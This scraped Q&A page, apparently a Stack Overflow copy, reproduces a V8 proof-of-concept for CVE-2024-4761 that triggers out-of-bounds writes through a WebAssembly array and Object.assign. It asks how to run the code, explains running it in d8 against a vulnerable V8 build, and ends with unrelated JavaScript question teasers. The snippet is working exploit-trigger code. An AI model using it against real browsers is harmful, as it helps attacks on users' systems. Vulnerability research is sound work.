Guide to developing and showcasing a proof of concept (PoC) for a Google Chrome vulnerability using Out of Bounds (oob) method

While reading through an article discussing the Proof of Concept of a CVE in Google Chrome (OOB issue), I came across this intriguing code snippet: (https://medium.com/@elniak/cve-2024-4761-exploiting-chromes-javascript-engine-highly-exploited-poc-presented-dcf9cab95c00)

const prefix = "...";
d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);
  let builder = new WasmModuleBuilder();
  let array = builder.addArray(kWasmI32, true);
  builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef]))
    .addBody([
            kExprLocalGet, 0,
            kGCPrefix, kExprArrayNewDefault, array,
            kGCPrefix, kExprExternConvertAny,
          ])
    .exportFunc();
/*
 builder.addFunction('set', makeSig([kWasmExternRef, kWasmI32, kWasmI32], []))
    .addBody([
            kExprLocalGet, 0,
            kGCPrefix, kExprAnyConvertExtern,
            kGCPrefix, kExprRefCastNull, array,
            kExprLocalGet, 1,
            kExprLocalGet, 2,
            kGCPrefix, kExprArraySet, array,
          ])
    .exportFunc();

*/
let instance = builder.instantiate({});
let wasm = instance.exports;
let array42 = wasm.createArray(42);
// %DebugPrint(array42);
let src = {};
src.a = 1;
delete src.a;
for (let i = 0; i < 1024; i++) {
  src[`p${i}`] = 1;
}

// %DebugPrint(src);
// %SetDataProperties(array42, src);
Object.assign(array42, src);

It seems to be JavaScript code.

How can I test and see the functionality of this code snippet?

I attempted saving it as a .js file and opening it in my Chrome browser (App version 110.80)

No luck so far. I'm unsure of how it could potentially pose harm or enable Remote Code Execution. I am seeking more insights on how this code snippet could be exploited.

This is solely for educational purposes.

javascriptgoogle-chromesecuritycve

Answer №1

Cautionary Note to Consider

If you are not well-versed in understanding the functionality of code obtained from an untrusted source through thorough examination, it is strongly advised that you refrain from executing it altogether.

This advice holds especially true when dealing with snippets provided in relation to security vulnerabilities, as there is a higher likelihood of encountering unexpected issues or consequences.

In the case of this particular Proof of Concept (PoC), be prepared for potential system instability due to its capability to write to various memory locations without restrictions.

how to demonstrate the working of this code snippet?

The code snippet you wish to test makes reference to a global variable known as d8, indicating that it is intended for use with the d8 command-line developer tool for the V8 engine.

Once you have installed d8 on your local machine (and have a vulnerable version of the V8 engine as required by the CVE mentioned), you can save the snippet to a file and execute it using d8 like any other command line program, for example: d8 script.js.

Similar questions

If you have not found the answer to your question or you are interested in this topic, then look at other similar questions below or use the search

What is the process for displaying the save file dialog in Safari?

I'm struggling with generating a PDF and saving it as a file in Safari using an Angular app and DocRaptor. I've tried various methods from Stack Overflow, but none seem to trigger the save file dialog. Instead, they either open the file in the cu ...

javascriptangularjshtmlsafaripdf-generation

Tips for updating mongoose user data with associated posts that share the same user id

As I dive into building my inaugural MERN application, a particular issue has arisen. The posts within the application contain the user id information: { "reward": { ... }, "_id": "5eb2d90d7d56c415cc4d5f97", "user": "5eabbb85b8814 ...

javascriptnode.jsdatabasemongodbmongoose

The Bootstrap modals seem to be invisible within the Rails application

Currently, I am integrating jquery into the devise views of a sample rails application. My intention is to test it on a sample app before implementing it in a production code. The controller and view for welcome are already set up. The routes.rb file loo ...

javascriptruby-on-rails

Navigating through JavaScript links in Selenium (Scrapy) and returning to the initial page: A step-by-step guide

Having some difficulties with pages that have javascript links embedded in them. This issue arises when the page contains a list of cities with javascript in their links. Each link needs to be navigated individually, scraping information and then returning ...

javascriptseleniumscrapy

Attempting to trigger CSS transitions using JavaScript will not be successful

I'm facing an issue where CSS transitions do not work as expected when triggered by JavaScript. let isSearchBarOpen = false; function toggleSearchBar() { if (isSearchBarOpen) { searchBar.style.display = "none"; } else { searchBar.sty ...

javascripthtmlcsscss-transitionsdom-manipulation

Having trouble importing my function component into a router in reactjs. Need some guidance on how to properly set it up

I am working on a Slider component function called export default Slider. In my App.js file, I have the following code: function App() { return ( <Router> <Routes> <Route exact path='/' element={<Home />} /> ...

javascriptreactjs

`Is it possible to implement the geocode function multiple times within a single post request using npm node-geocoder?`

I've been struggling to develop a function returnCoords(par1) that allows users to input text and convert it to coordinates using the node-geocoder npm. Despite my efforts, the function returns undefined. I attempted to resolve this using async and aw ...

javascriptnode.jsfunctiongeocodegeocoder

Encountering a 404 error when trying to reload the page?

My React Router is functioning properly in the development environment. Here's what I implemented in Webpack Dev Server: historyApiFallback: { index: 'index.html', } Now, when transitioning to production mode, I wanted to replicate the ...

javascriptexpresswebpack

Transforming an object into an array of objects with the power of JavaScript

Looking to transform an object with the following structure: { From: {"A","B","C"}, To: {"A1","B1","C1"}, value: {1,2,3} } I need to convert this array: [ {from: "A" ,to: "A1" , value: 1 }, {from: "B" ,to: "B1" , value: 2}, {from: "C" ,to: "C1" ...

javascriptarraysjson

Exploring AngularJS's capabilities with Cross Domain POST requests

One query I have concerning CORS requests that include the HTTP Authorization header: I've noticed that the web browser doesn't seem to send the Authorization header with POST requests, is there a workaround for this? Below is the Angular code ...

javascriptasp.netangularjs

The additional cost associated with using a React hook is called the "

Our system includes a theme context provider that passes down a theme to all child components, calculated based on the device's dimensions. We can easily access these values using the useTheme hook in any component. In addition, we have a constants f ...

javascriptreactjsreact-hooksstyled-components

Is the 'wait > remaining' condition ever satisfied in the throttle function of underscore.js?

Check out the library code at line 860: https://github.com/jashkenas/underscore/blob/master/underscore.js if (remaining <= 0 || remaining > wait) Under what circumstance would the second part of this statement be true? Background - This is my firs ...

javascriptunderscore.jsthrottling

Encountered an error when creating my own AngularJS module: Unable to instantiate

Attempting to dive into TypeScript and AngularJS, I encountered a perplexing error after following a tutorial for just a few lines. It appears that there may be an issue with my mydModule? angular.js:68 Uncaught Error: [$injector:modulerr] Failed to inst ...

javascriptangularjsvisual-studiotypescript

The LinkedIn API encountered an error when attempting to retrieve historical follower data, resulting in a HTTP

I've scoured the depths of the internet in search of a solution to my problem, but none seem to fit what I need. My goal is to retrieve historical follower data from LinkedIn's API using this call: ${companyId}/historical-follow-statistics?time- ...

javascriptrestapiexpresslinkedin-api

Local storage synchronization in progress, please hold on

Currently, there seems to be a synchronization issue between the local storage and the server. Countries, cities, and users are synchronized with the server separately through different Ajax calls. The problem at hand is that other JavaScript codes (such ...

javascriptjquerylocal-storage

Switching between two identical components can be easily achieved with VueJS

Assume I have a file named foo.vue, which I import into the parent component as components called a and b, and they are displayed based on a variable called show. When switching between components a and b in the parent without setting show = null, various ...

javascriptvue.jspromisetimeout

Ensure that parameters are validated correctly in the Next.JS application router using the searchParams method

When building the page, I need to properly validate params in the Next.JS app router using searchParams. My goal is to show a main image (coverImage) for each photo on the /gallery page. When a photo is clicked, I want to display more photos of the same k ...

javascriptreactjstypescriptnext.jsnext.js13

Animating positional changes with translate percentages in Android's native browser version 4.x

Lately, I've been developing a compact web application that incorporates the well-liked sidebar interaction design. In applying CSS3 animations to shift the sidebar into view, the animation glides smoothly but halts at the correct spot in the native b ...

javascriptcssmobileandroid-browser

Is there a way to eliminate the border of an image attribute pulled from an input field?

Seeking assistance with a persistent issue I'm facing. I have an input for an image and a script to display the selected image. However, when the input is empty, a frustrating black border appears around the image attribute. How can I remove this bord ...

javascripthtml

Example of voxel painting using THREE.js

As I delve into the world of THREE.js and explore various examples, one that caught my eye is the Voxel Painter example. My current challenge involves ensuring that whenever a new cube is created, the roll-over mesh always moves on top of the recently pla ...

javascriptthree.js